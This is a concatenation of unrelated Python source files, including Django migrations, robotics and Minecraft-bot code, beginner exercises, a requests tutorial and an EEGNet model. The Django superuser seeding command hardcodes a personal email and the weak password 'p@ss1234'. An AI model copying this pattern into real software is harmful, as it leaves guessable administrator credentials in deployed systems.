class Command(BaseCommand):
def handle(self, *args, **options):
self.generate_site_info()
self.stdout.write(self.style.SUCCESS('Site info generated successfully.'))
# Generate role, permissions for super organization
self.generate_super_user()
self.stdout.write(self.style.SUCCESS('Super user generated successfully.'))
def generate_super_user(self):
"""
Generate super user
:return: user object
"""
super_user = SystemUser.objects.filter(username='shafikshaon')
if not super_user:
super_user = SystemUser.objects.create(
first_name='Shafikur',
last_name='Rahman',
username='shafikshaon@gmail.com',
email='shafikshaon@gmail.com',
is_superuser=True,
is_active=True,
is_organization_admin=True,
is_staff=True,
code='U-00001'
)
super_user.set_password('p@ss1234')
super_user.save()
return super_user
def generate_site_info(self):
site = Site.objects.first()
site.domain = config('DOMAIN')
site.name = config('SITE_NAME')
site.save()
|
from .system_user import *
|
# test 1
# 导入自己编写的文件
import pizza
pizza.make_pizza(16, 'pepperoni')
pizza.make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')
# test 2
# 导入特定函数
from pizza import make_pizza
make_pizza(17,'hello')
# test 3
# 导入函数并设置别名
import pizza as p
p.make_pizza(18,"as")
# test 4
# 导入模块中所有函数
from pizza import *
'''
应给函数指定描述性名称,且只在其中使用小写字母和下划线
每个函数都应包含简要地阐述其功能的注释,该注释应紧跟在函数定义后面,并采用文档字符串格式
给形参指定默认值时,等号两边不要有空格
所有的 import 语句都应放在文件开头,唯一例外的情形是,在文件开头使用了注释来描述整个程序
''' |
first_number = int(input('Enter first number: '))
second_number = int(input('Enter second number: '))
if first_number > second_number:
print('larger')
elif first_number < second_number:
print('smaller')
else:
print('equal')
|
import logging
import copy
import time
from spockbot.mcdata import blocks
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools.event import EVENT_UNREGISTER
from spockbot.vector import Vector3
from utils.constants import *
import utils.movement_utils as mov
import utils.camera_utils as cam
__author__ = 'Bradley Sheneman'
logger = logging.getLogger('spockbot')
@pl_announce('VisualSensor')
class VisualSensorPlugin(PluginBase):
requires = ('Event', 'Timers', 'ClientInfo', 'World')
events = {
'client_join_game': 'handle_client_join',
'sensor_tick_vision': 'handle_camera_tick',
}
def __init__(self, ploader, settings):
super(VisualSensorPlugin, self).__init__(ploader, settings)
# not sure if this actually initializes the dict ahead of time...
cam.init_block_mats()
def handle_camera_tick(self, name, data):
start = time.time()
blocks_percept = self.get_visible_blocks(data)
relative_percept = self.percept_to_relative(blocks_percept)
end = time.time()
print("total ms for camera tick: {}".format(1000*(end-start)))
logger.info("visual percept: {}".format(blocks_percept))
logger.info("relative visual percept: {}".format(relative_percept))
self.event.emit('agent_visual_percept', relative_percept)
def handle_client_join(self, name, data):
pass
def get_visible_blocks(self, data):
# all block coordinates in the FOV cone (ignoring visibility)
coords = cam.get_coordinates_in_range(data)
#print("coordinates: {}".format(coords))
# the actual block types given the world, at those locations
blocks = self.get_block_multi(coords)
#print("blocks: {}".format(blocks))
vis_blocks = cam.get_visible_blocks(blocks)
#mov.log_agent_vision(vis_blocks)
return vis_blocks
def get_block_multi(self, coords):
blocks = list()
for pos in coords:
data = copy.copy(pos)
data = dict()
data['coords'] = (pos['x'],pos['y'],pos['z'])
data['id'], data['meta'] = self.world.get_block(*data['coords'])
blocks.append(data)
return blocks
def percept_to_relative(self, percept):
pos = self.clientinfo.position
pos_coords = mov.get_nearest_position(pos.x, pos.y, pos.z)
rel_percept = dict()
for xyz in percept:
rel_coords = tuple([p1-p0 for p0,p1 in zip(pos_coords,xyz)])
rel_percept[rel_coords] = percept[xyz]
return rel_percept
|
class CommentDemo:
"""
注释Demo,演示在类、方法、变量定义时,注释书写的位置
"""
list1 = ['test', 12, 45]
"""
定义变量
"""
def test(self, x, y):
"""
定义方法
"""
pass
|
# Generated by Django 2.1.3 on 2018-11-06 12:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0028_auto_20181107_0141'),
]
operations = [
migrations.AlterField(
model_name='receiver',
name='receiver_dev_id',
field=models.CharField(default='', max_length=16, unique=True),
),
]
|
from sqlalchemy.types import TypeDecorator, CHAR
from sqlalchemy.dialects.postgresql import UUID
import uuid
class GUID(TypeDecorator):
"""Platform-independent GUID type.
Uses PostgreSQL's UUID type, otherwise uses
CHAR(32), storing as stringified hex values.
"""
impl = CHAR
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(UUID())
else:
return dialect.type_descriptor(CHAR(32))
def process_bind_param(self, value, dialect):
if value is None:
return value
elif dialect.name == 'postgresql':
return str(value)
else:
if not isinstance(value, uuid.UUID):
return "%.32x" % uuid.UUID(value).int
else:
# hexstring
return "%.32x" % value.int
def process_result_value(self, value, dialect):
if value is None:
return value
else:
if not isinstance(value, uuid.UUID):
value = uuid.UUID(value)
return value
|
# Generated by Django 2.1.3 on 2018-11-07 08:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0039_auto_20181107_2107'),
]
operations = [
migrations.AlterField(
model_name='location',
name='comment',
field=models.CharField(blank=True, max_length=128, null=True),
),
]
|
coord_to_dir = {
(0,0): "C",
(0,1): "S",
(1,1): "SE",
(1,0): "E",
(1,-1): "NE",
(0,-1): "N",
(-1, -1): "NW",
(-1, 0): "W",
(-1, 1): "SW",
}
dir_to_coord = {
"C": (0,0),
"S": (0,1),
"SE": (1,1),
"E": (1,0),
"NE": (1,-1),
"N": (0,-1),
"NW": (-1, -1),
"W": (-1, 0),
"SW": (-1, 1),
}
def calculate_dir(start, target):
"""
Calculate the direction in which to go to get from start to target.
start: a tuple representing an (x,y) point
target: a tuple representing an (x,y) point
as_coord: whether you want a coordinate (-1,0) or a direction (S, NW, etc.)
"""
dx = target[0] - start[0]
dy = target[1] - start[1]
if dx < 0:
dx = -1
elif dx > 0:
dx = 1
if dy < 0:
dy = -1
elif dy > 0:
dy = 1
return (dx, dy)
rotate_arr = [
(0,1),
(1,1),
(1,0),
(1,-1),
(0,-1),
(-1, -1),
(-1, 0),
(-1, 1)
]
def get_list_index(lst, tup):
# only works for 2-tuples
for i in range(len(lst)):
if lst[i][0] == tup[0] and lst[i][1] == tup[1]:
return i
def rotate(orig_dir, amount):
direction = rotate_arr[(get_list_index(rotate_arr, orig_dir) + amount) % 8]
return direction
def reflect(full_map, loc, horizontal=True):
v_reflec = (len(full_map[0]) - loc[0], loc[1])
h_reflec = (loc[0], len(full_map) - loc[1])
if horizontal:
return h_reflec if full_map[h_reflec[1]][h_reflec[0]] else v_reflec
else:
return v_reflec if full_map[v_reflec[1]][v_reflec[0]] else h_reflec
def is_passable(full_map, loc, coord_dir, robot_map=None):
new_point = (loc[0] + coord_dir[0], loc[1] + coord_dir[1])
if new_point[0] < 0 or new_point[0] >= len(full_map):
return False
if new_point[1] < 0 or new_point[1] >= len(full_map):
return False
if not full_map[new_point[1]][new_point[0]]:
return False
if robot_map is not None and robot_map[new_point[1]][new_point[0]] > 0:
return False
return True
def apply_dir(loc, dir):
return (loc[0] + dir[0], loc[1] + dir[1])
def goto(loc, target, full_map, robot_map, already_been):
goal_dir = calculate_dir(loc, target)
if goal_dir is (0,0):
return (0,0)
# self.log("MOVING FROM " + str(my_coord) + " TO " + str(nav.dir_to_coord[goal_dir]))
end_dir = goal_dir
i = 0
while not is_passable(full_map, loc, end_dir, robot_map) and i < 4:# or apply_dir(loc, goal_dir) in already_been: # doesn't work because `in` doesn't work :(
# alternate checking either side of the goal dir, by increasing amounts (but not past directly backwards)
if i > 0:
i = -i
else:
i = -i + 1
end_dir = rotate(goal_dir, i)
return end_dir
|
#!/usr/bin/python3
# coding=utf8
import sys
sys.path.append('/home/pi/ArmPi/')
import cv2
import time
import Camera
import threading
from LABConfig import *
from ArmIK.Transform import *
from ArmIK.ArmMoveIK import *
import HiwonderSDK.Board as Board
from CameraCalibration.CalibrationConfig import *
if sys.version_info.major == 2:
print('Please run this program with python3!')
sys.exit(0)
AK = ArmIK()
range_rgb = {
'red': (0, 0, 255),
'blue': (255, 0, 0),
'green': (0, 255, 0),
'black': (0, 0, 0),
'white': (255, 255, 255),
}
__target_color = ('red',)
# set detection color
def setTargetColor(target_color):
global __target_color
#print("COLOR", target_color)
__target_color = target_color
return (True, ())
# find outline of largest area
# contour list, each contour is checked and largest area selected
def getAreaMaxContour(contours):
contour_area_temp = 0
contour_area_max = 0
area_max_contour = None
for c in contours: # for each saved contour
contour_area_temp = math.fabs(cv2.contourArea(c)) # calculate contour area
if contour_area_temp > contour_area_max:
contour_area_max = contour_area_temp
if contour_area_temp > 300: # the contour of the maximum area is valid to filter out interference only if
area_max_contour = c # the area is greater than 300
return area_max_contour, contour_area_max # return largest outline
# angle at which the gripper is closed when clamped
servo1 = 500
# initial position of arm
def initMove():
Board.setBusServoPulse(1, servo1 - 50, 300)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
def setBuzzer(timer):
Board.setBuzzer(0)
Board.setBuzzer(1)
time.sleep(timer)
Board.setBuzzer(0)
#set RGB light color of the arm to match the color you track
def set_rgb(color):
if color == "red":
Board.RGB.setPixelColor(0, Board.PixelColor(255, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(255, 0, 0))
Board.RGB.show()
elif color == "green":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 255, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 255, 0))
Board.RGB.show()
elif color == "blue":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 255))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 255))
Board.RGB.show()
else:
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 0))
Board.RGB.show()
count = 0
track = False
_stop = False
get_roi = False
center_list = []
first_move = True
__isRunning = False
detect_color = 'None'
action_finish = True
start_pick_up = False
start_count_t1 = True
# variable reset
def reset():
global count
global track
global _stop
global get_roi
global first_move
global center_list
global __isRunning
global detect_color
global action_finish
global start_pick_up
global __target_color
global start_count_t1
count = 0
_stop = False
track = False
get_roi = False
center_list = []
first_move = True
__target_color = ()
detect_color = 'None'
action_finish = True
start_pick_up = False
start_count_t1 = True
# initlaizes arm
def init():
print("ColorTracking Init")
initMove()
# reset arm
def start():
global __isRunning
reset()
__isRunning = True
print("ColorTracking Start")
# stops arm
def stop():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorTracking Stop")
# exits arm
def exit():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorTracking Exit")
rect = None
size = (640, 480)
rotation_angle = 0
unreachable = False
world_X, world_Y = 0, 0
world_x, world_y = 0, 0
# arm movement thread
def move():
global rect
global track
global _stop
global get_roi
global unreachable
global __isRunning
global detect_color
global action_finish
global rotation_angle
global world_X, world_Y
global world_x, world_y
global center_list, count
global start_pick_up, first_move
# matt placement coordinates for colors
coordinate = {
'red': (-15 + 0.5, 12 - 0.5, 1.5),
'green': (-15 + 0.5, 6 - 0.5, 1.5),
'blue': (-15 + 0.5, 0 - 0.5, 1.5),
}
while True:
if __isRunning:
if first_move and start_pick_up: # when object is first detected
action_finish = False
set_rgb(detect_color)
setBuzzer(0.1)
result = AK.setPitchRangeMoving((world_X, world_Y - 2, 5), -90, -90, 0) # do not fill in the run time parameters, adaptive run time
if result == False:
unreachable = True
else:
unreachable = False
time.sleep(result[2]/1000) # Third item of the return parameter is time
start_pick_up = False
first_move = False
action_finish = True
elif not first_move and not unreachable: # Not first time the object has been detected
set_rgb(detect_color)
if track: # if in tracking phase
if not __isRunning: # stop and exit flag bit detection
continue
AK.setPitchRangeMoving((world_x, world_y - 2, 5), -90, -90, 0, 20)
time.sleep(0.02)
track = False
if start_pick_up: #if object has not moved for a period of time, start clamping
action_finish = False
if not __isRunning: # stop and exit flag bit detection
continue
Board.setBusServoPulse(1, servo1 - 280, 500) # set claws open
# calculate angle at which gripper needs to rotate
servo2_angle = getAngle(world_X, world_Y, rotation_angle)
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.8)
if not __isRunning:
continue
AK.setPitchRangeMoving((world_X, world_Y, 2), -90, -90, 0, 1000) # lower height
time.sleep(2)
if not __isRunning:
continue
Board.setBusServoPulse(1, servo1, 500) # close gripper
time.sleep(1)
if not __isRunning:
continue
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((world_X, world_Y, 12), -90, -90, 0, 1000) # lift robot arm
time.sleep(1)
if not __isRunning:
continue
# Classify and place blocks of different colors
result = AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0)
time.sleep(result[2]/1000)
if not __isRunning:
continue
servo2_angle = getAngle(coordinate[detect_color][0], coordinate[detect_color][1], -90)
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], coordinate[detect_color][2] + 3), -90, -90, 0, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color]), -90, -90, 0, 1000)
time.sleep(0.8)
if not __isRunning:
continue
Board.setBusServoPulse(1, servo1 - 200, 500) # Claws are open and object is lowered
time.sleep(0.8)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 800)
time.sleep(0.8)
initMove() # go back to original position
time.sleep(1.5)
detect_color = 'None'
first_move = True
get_roi = False
action_finish = True
start_pick_up = False
set_rgb(detect_color)
else:
time.sleep(0.01)
else:
if _stop:
_stop = False
Board.setBusServoPulse(1, servo1 - 70, 300)
time.sleep(0.5)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
time.sleep(1.5)
time.sleep(0.01)
# run move thread
th = threading.Thread(target=move)
th.setDaemon(True)
th.start()
t1 = 0
roi = ()
last_x, last_y = 0, 0
def run(img):
global roi
global rect
global count
global track
global get_roi
global center_list
global __isRunning
global unreachable
global detect_color
global action_finish
global rotation_angle
global last_x, last_y
global world_X, world_Y
global world_x, world_y
global start_count_t1, t1
global start_pick_up, first_move
img_copy = img.copy()
img_h, img_w = img.shape[:2]
cv2.line(img, (0, int(img_h / 2)), (img_w, int(img_h / 2)), (0, 0, 200), 1)
cv2.line(img, (int(img_w / 2), 0), (int(img_w / 2), img_h), (0, 0, 200), 1)
if not __isRunning:
return img
frame_resize = cv2.resize(img_copy, size, interpolation=cv2.INTER_NEAREST)
frame_gb = cv2.GaussianBlur(frame_resize, (11, 11), 11)
#if the objec is detected in the area, the area is considered detected until it is not
if get_roi and start_pick_up:
get_roi = False
frame_gb = getMaskROI(frame_gb, roi, size)
frame_lab = cv2.cvtColor(frame_gb, cv2.COLOR_BGR2LAB) # convert image to LAB space
area_max = 0
areaMaxContour = 0
if not start_pick_up:
for i in color_range:
if i in __target_color:
detect_color = i
frame_mask = cv2.inRange(frame_lab, color_range[detect_color][0], color_range[detect_color][1]) # Threshold color of camera image to be range around expected block color
opened = cv2.morphologyEx(frame_mask, cv2.MORPH_OPEN, np.ones((6, 6), np.uint8)) # filter out detections outside of block
closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, np.ones((6, 6), np.uint8)) # filter out non-detections within object
contours = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2] # generate contours
areaMaxContour, area_max = getAreaMaxContour(contours) # find contour with max area
if area_max > 2500: # if maximum area is above threshold
rect = cv2.minAreaRect(areaMaxContour)
box = np.int0(cv2.boxPoints(rect))
roi = getROI(box) #get ROI area
get_roi = True
img_centerx, img_centery = getCenter(rect, roi, size, square_length) # get center pixel cordinates of block
world_x, world_y = convertCoordinate(img_centerx, img_centery, size) # convert block pixel cordinates to world position
cv2.drawContours(img, [box], -1, range_rgb[detect_color], 2)
cv2.putText(img, '(' + str(world_x) + ',' + str(world_y) + ')', (min(box[0, 0], box[2, 0]), box[2, 1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, range_rgb[detect_color], 1) # draw the center point on image
distance = math.sqrt(pow(world_x - last_x, 2) + pow(world_y - last_y, 2)) #Compare the last cordinates to determinie if you are moving
last_x, last_y = world_x, world_y
track = True
#print(count,distance)
# if block reached destination start next pickup operation
if action_finish:
if distance < 0.3:
center_list.extend((world_x, world_y))
count += 1
if start_count_t1:
start_count_t1 = False
t1 = time.time()
if time.time() - t1 > 1.5:
rotation_angle = rect[2]
start_count_t1 = True
world_X, world_Y = np.mean(np.array(center_list).reshape(count, 2), axis=0)
count = 0
center_list = []
start_pick_up = True
else:
t1 = time.time()
start_count_t1 = True
count = 0
center_list = []
return img
if __name__ == '__main__':
init()
start()
__target_color = ('red', )
my_camera = Camera.Camera()
my_camera.camera_open()
while True:
img = my_camera.frame
if img is not None:
frame = img.copy()
Frame = run(frame)
cv2.imshow('Frame', Frame)
key = cv2.waitKey(1)
if key == 27:
break
my_camera.camera_close()
cv2.destroyAllWindows()
|
from datetime import datetime
import pytest
from dates import _get_dates, convert_to_datetime, get_month_most_posts
@pytest.fixture(scope="module")
def dates():
return _get_dates()
@pytest.mark.parametrize("date_str, expected", [
('Thu, 04 May 2017 20:46:00 +0200', datetime(2017, 5, 4, 20, 46)),
('Wed, 22 Mar 2017 12:42:00 +0100', datetime(2017, 3, 22, 12, 42)),
('Mon, 20 Feb 2017 00:01:00 +0100', datetime(2017, 2, 20, 0, 1)),
('Sun, 07 Jan 2018 12:00:00 +0100', datetime(2018, 1, 7, 12, 0)),
('Sat, 15 Apr 2017 01:00:00 +0200', datetime(2017, 4, 15, 1, 0))
])
def test_convert_to_datetime(date_str, expected):
dt = convert_to_datetime(date_str)
# support tz aware datetimes
assert dt.replace(tzinfo=None) == expected.replace(tzinfo=None)
def test_get_month_most_posts(dates):
converted_dates = [convert_to_datetime(d) for d in dates]
assert get_month_most_posts(converted_dates) == '2017-01'
def test_get_month_most_posts_more_in_2018(dates):
# make Jan 2018 > Jan 2017
for _ in range(25):
dates.append('Sun, 07 Jan 2018 12:00:00 +0100')
converted_dates = [convert_to_datetime(d) for d in dates]
assert get_month_most_posts(converted_dates) == '2018-01' |
import json
import requests
r = requests.get('https://api.github.com/events')
print(r.status_code)
print(r.__str__)
print(r.apparent_encoding)
print(r.headers)
v = 0
content = r.content
print(type(content))
for line in content:
if(v > 5):
break
print(str(line))
v += 1
r = requests.post('https://httpbin.org/post', data={'key': 'value'})
print(r.status_code)
print(r.headers)
r = requests.put('https://httpbin.org/put', data={'arjun': 'bhag'})
print(r.status_code)
r = requests.delete('https://httpbin.org/delete')
print(r.status_code)
r = requests.head('https://httpbin.org/get')
print(r.status_code)
r = requests.options('https://httpbin.org/get')
print(r.status_code)
print(r.text)
r = requests.get('https://api.github.com/events')
print(r.text)
print(r.encoding)
print(r.url)
payload = {'key1': 'value1', 'key2': [1, 2, 3]}
r = requests.get('https://api.github.com/events', params=payload)
print(r.url)
#r.encoding = 'ISO-8859-1'
print(type(r.text))
p = r.text.split(',')
v = 0
for line in p:
print(line)
v += 1
if v > 5:
break
print(r.json())
print(r.raise_for_status())
print(r.status_code)
r = requests.get('https://api.github.com/events', stream=True)
print(r.raw.read(5))
url = 'https://api.github.com/some/endpoint'
payload = {'some': 'data'}
r = requests.post(url, data=json.dumps(payload))
print(r.status_code) # 404
url = 'https://httpbin.org/post'
files = {'file': open('basic.py', 'rb')}
r = requests.post(url, files=files)
print(type(r.content))
print(r.text)
if r.status_code == requests.codes.ok:
print('Hi hello bol k ')
print(requests.codes.ok)
print(requests)
url = 'https://httpbin.org/cookies'
cookies = dict(cookies_are='working')
r = requests.get(url, cookies=cookies)
print(r.text)
|
print (50*101)**2 - sum([x**2 for x in xrange(1,101)])
|
from myhdl import *
from random import randrange
_code_git_version = "f114546e1715d9e5847695c64e486e6793ebb9ea"
_code_repository = "https://github.com/plops/cl-py-generator/tree/master/example/56_myhdl/source/run_00_flop.py"
_code_generation_time = "08:39:04 of Thursday, 2021-06-10 (GMT+1)"
def dff(q, d, clk):
@always(clk.posedge)
def logic():
q.next = d
return logic
def test_dff():
q, d, clk = [Signal(bool(0)) for i in range(3)]
dff_inst = dff(q, d, clk)
@always(delay(10))
def clkgen():
clk.next = not (clk)
@always(clk.negedge)
def stimulus():
d.next = randrange(2)
return dff_inst, clkgen, stimulus
def simulate(timesteps):
tb = traceSignals(test_dff)
sim = Simulation(tb)
sim.run(timesteps)
simulate(2000)
def convert():
q = Signal(bool(0))
d = Signal(bool(0))
clk = Signal(bool(0))
toVerilog(dff, q, d, clk)
convert()
|
from .forms import ElectionRemindersSignupForm, MailingListSignupForm
from .constants import MAILING_LIST_FORM_PREFIX, ELECTION_REMINDERS_FORM_PREFIX
def signup_form(request):
initial = {"source_url": request.path}
if MAILING_LIST_FORM_PREFIX in request.POST:
mailing_list_form = MailingListSignupForm(
initial=initial,
data=request.POST,
)
else:
mailing_list_form = MailingListSignupForm(initial=initial)
if ELECTION_REMINDERS_FORM_PREFIX in request.POST:
election_reminders_form = ElectionRemindersSignupForm(
initial=initial,
data=request.POST,
)
else:
election_reminders_form = ElectionRemindersSignupForm(initial=initial)
return {
"mailing_list_form": mailing_list_form,
"election_reminders_form": election_reminders_form,
}
|
class Node:
left = None
right = None
value = 0
def __init__(self, data):
self.value = data
def Print(self, before):
if self.left != None and self.right != None:
print(before + "├── " + str(self.left.value))
self.left.Print()
print(before + "└── " + str(self.right.value))
self.left.Print()
return ""
if self.left != None and self.right == None:
print(before + "└── " + str(self.left.value))
self.left.Print()
return ""
if self.right != None and self.left == None:
print(before + "└── " + str(self.right.value))
self.right.Print()
return ""
def PrintValues(self):
if self.left != None:
self.left.PrintValues()
if self.right != None:
self.right.PrintValues()
print(self.value, end = " ")
def AddValue(self, value):
if(self.value > value):
if(self.left != None):
#print("Going left")
self.left.AddValue(value)
else:
self.left = Node(value)
#print("Left Node created")
else:
if(self.right != None):
#print("Going right")
self.right.AddValue(value)
else:
self.right = Node(value)
#print("Right Node created")
def Print2(self, data, before, index):
if self.left != None and self.right != None:
data.insert(index, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "┌──── " + str(self.left.value))
data.insert(index + 1, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "└──── " + str(self.right.value))
self.left.Print2(data, before + 6, index)
self.right.Print2(data, before + 6, index + 1)
return
if self.left != None:
data.insert(index, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "┌──── " + str(self.left.value))
self.left.Print2(data, before + 6, index)
return
if self.right != None:
data.insert(index + 1, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "└──── " + str(self.right.value))
self.right.Print2(data, before + 6, index + 1)
def ValueFixed(self):
value = ""
if(len(str(self.value)) < 6):
value += self.value
while len(value) < 6:
value += " "
else:
i = 0
while len(value) < 6:
value += str(self.value)[i]
i += 1
return value
def GetSpaces(self, count):
value = ""
for x in range(count):
value += " "
return value
#code from: https://stackoverflow.com/a/54074933
#code cleaned up by me
def _display_aux(self):
"""Returns list of strings, width, height, and horizontal coordinate of the root."""
# No child.
if self.right is None and self.left is None:
line = '%s' % self.value
width = len(line)
height = 1
middle = width // 2
return [line], width, height, middle
# Only left child.
if self.right is None:
lines, oldWidth, oldHeight, oldMiddle = self.left._display_aux()
line = '%s' % self.value
width = len(line)
first_line = (oldMiddle + 1) * ' ' + (oldWidth - oldMiddle - 1) * '_' + line
second_line = oldMiddle * ' ' + '/' + (oldWidth - oldMiddle - 1 + width) * ' '
shifted_lines = []
for line in lines:
shifted_lines.append(line + width * ' ')
newLines = [first_line, second_line] + shifted_lines
return newLines, oldWidth + width, oldHeight + 2, oldWidth + width // 2
# Only right child.
if self.left is None:
lines, oldWidth, oldHeight, oldMiddle = self.right._display_aux()
line = '%s' % self.value
width = len(line)
first_line = line + oldMiddle * '_' + (oldWidth - oldMiddle) * ' '
second_line = (width + oldMiddle) * ' ' + '\\' + (oldWidth - oldMiddle - 1) * ' '
shifted_lines = []
for line in lines:
shifted_lines.append(width * ' ' + line)
newLines = [first_line, second_line] + shifted_lines
return newLines, oldWidth + width, oldHeight + 2, width // 2
# Two children.
left, oldWidthLeft, oldHeightLeft, oldMiddleLeft = self.left._display_aux()
right, oldWidthRight, oldHeightRight, oldMiddleRight = self.right._display_aux()
line = '%s' % self.value
width = len(line)
first_line = (oldMiddleLeft + 1) * ' ' + (oldWidthLeft - oldMiddleLeft - 1) * '_' + line + oldMiddleRight * '_' + (oldWidthRight - oldMiddleRight) * ' '
second_line = oldMiddleLeft * ' ' + '/' + (oldWidthLeft - oldMiddleLeft - 1 + width + oldMiddleRight) * ' ' + '\\' + (oldWidthRight - oldMiddleRight - 1) * ' '
if oldHeightLeft < oldHeightRight:
left += [oldWidthLeft * ' '] * (oldHeightRight - oldHeightLeft)
elif oldHeightRight < oldHeightLeft:
right += [oldWidthRight * ' '] * (oldHeightLeft - oldHeightRight)
zipped_lines = zip(left, right)
lines = [first_line, second_line] + [a + width * ' ' + b for a, b in zipped_lines]
return lines, oldWidthLeft + oldWidthRight + width, max(oldHeightLeft, oldHeightRight) + 2, oldWidthLeft + width // 2
def Print3(self, data, before, line):
if self.left != None:
self.left.Print3(data, before + 6, "┌──── ")
data.append(self.GetBeforeStr(before) + line + str(self.value))
if self.right != None:
self.right.Print3(data, before + 6, "└──── ")
def GetBeforeStr(self, before):
returnStr = ""
while(before > 0):
before -= 6
returnStr += "|" + " " * 5
return returnStr |
# Generated by Django 2.1.2 on 2018-11-28 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0007_auto_20181127_2315'),
]
operations = [
migrations.AddField(
model_name='order',
name='status_of_order',
field=models.CharField(choices=[('new', 'новий'), ('executed', 'виконаний')], default='new', max_length=10, verbose_name='Статус заказу'),
),
]
|
"""
This file contains the golden model for the quantized EEGNet in integer representation.
"""
__author__ = "Tibor Schneider"
__email__ = "sctibor@student.ethz.ch"
__version__ = "0.0.1"
__date__ = "2020/01/20"
__license__ = "Apache 2.0"
__copyright__ = """
Copyright (C) 2020 ETH Zurich. All rights reserved.
Author: Tibor Schneider, ETH Zurich
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the License); you may
not use this file except in compliance with the License.
You may obtain a copy of the License at
www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an AS IS BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from operator import mul
from functools import reduce
import json
import numpy as np
import convert_torch_format as convert
import functional as F
class GoldenModel:
"""
Golden EEGNet Model
"""
def __init__(self, config_file, net_file, clip_balanced=True, no_scale_between_l1_l2=False, reorder_bn=True):
"""
Initialize the model based on the config file and the npz file containing all weights
Parameters:
- config_file: filename of config.json (from QuantLab)
- net_file: filename of net.npz (exported from QuantLab)
"""
# load network parameters
net = np.load(net_file)
# load configuration file
with open(config_file, "r") as _f:
config = json.load(_f)
# we only need the network parameters
net_params = config["indiv"]["net"]["params"]
# only allow nets with 255 levels
assert net_params["weightInqNumLevels"] == 255
assert net_params["actSTENumLevels"] == 255
# only allow nets which are trained by floorToZero
assert net_params["floorToZero"]
# initialize dimensions
self.num_levels = net_params["weightInqNumLevels"]
self.F1 = net_params["F1"]
self.F2 = net_params["F2"]
self.D = net_params["D"]
self.C = net_params["C"]
self.T = net_params["T"]
self.N = net_params["N"]
self.reorder_bn = reorder_bn
net_params["reorder_bn"] = reorder_bn
if self.F2 is None:
self.F2 = self.D * self.F1
# only allow F2 = F1 * D
assert self.F2 == self.F1 * self.D
# load individual layers
if no_scale_between_l1_l2:
self.layers = [
FusedLayer12(net, **net_params, clip_balanced=clip_balanced),
Layer3(net, **net_params, clip_balanced=clip_balanced),
Layer4(net, **net_params, clip_balanced=clip_balanced),
Layer5(net, **net_params, clip_balanced=clip_balanced)
]
else:
self.layers = [
Layer1(net, **net_params, clip_balanced=clip_balanced),
Layer2(net, **net_params, clip_balanced=clip_balanced),
Layer3(net, **net_params, clip_balanced=clip_balanced),
Layer4(net, **net_params, clip_balanced=clip_balanced),
Layer5(net, **net_params, clip_balanced=clip_balanced)
]
self.input_scale = self.layers[0].input_scale
self.output_scale = self.layers[-1].output_scale
self.input_shape = self.layers[0].input_shape
self.output_shape = self.layers[-1].output_shape
def __str__(self):
ret = "\n\n".join([str(l) for l in self.layers])
ret += "\n\nTotal Memory: {} B".format(self.mem_size())
return ret
def __call__(self, x):
for l in self.layers:
x = l(x)
return x
def num_params(self):
return sum([l.num_params() for l in self.layers])
def mem_size(self):
return sum([l.mem_size() for l in self.layers])
class Layer:
"""
Abstract Layer class
Important Fields:
- input_shape, output_shape
- input_scale, output_scale
"""
def __init__(self, clip_balanced=False, **params):
self.input_shape = (0,)
self.output_shape = (0,)
self.name = ""
self.input_scale = 1
self.output_scale = 1
self.clip_balanced = clip_balanced
def __call__(self, x):
""" Executes the layer """
return x
def __str__(self):
""" returns a formated string with a summary of the layer """
ret = "{}\n".format(self.name)
ret += " Input: {}\n".format(self.input_shape)
ret += " Output: {}\n".format(self.output_shape)
ret += " n params: {}\n".format(self.num_params())
ret += " Memory: {} B".format(self.mem_size())
return ret
def num_params(self):
""" Returns the number of parameters """
return 0
def mem_size(self):
""" Returns the number of bytes in memory """
return 0
class FusedLayer12(Layer):
"""
Convolution(time) + BN + Convolution(space) + BN + RELU + POOL, no scale in between
"""
def __init__(self, net, C, T, F1, F2, clip_balanced=True, **params):
self.name = "Layer 1: Convolution in Time + Batch Norm"
self.C = C
self.T = T
self.F1 = F1
self.F2 = F2
self.input_shape = ((C, T))
self.output_shape = ((F2, T // 8))
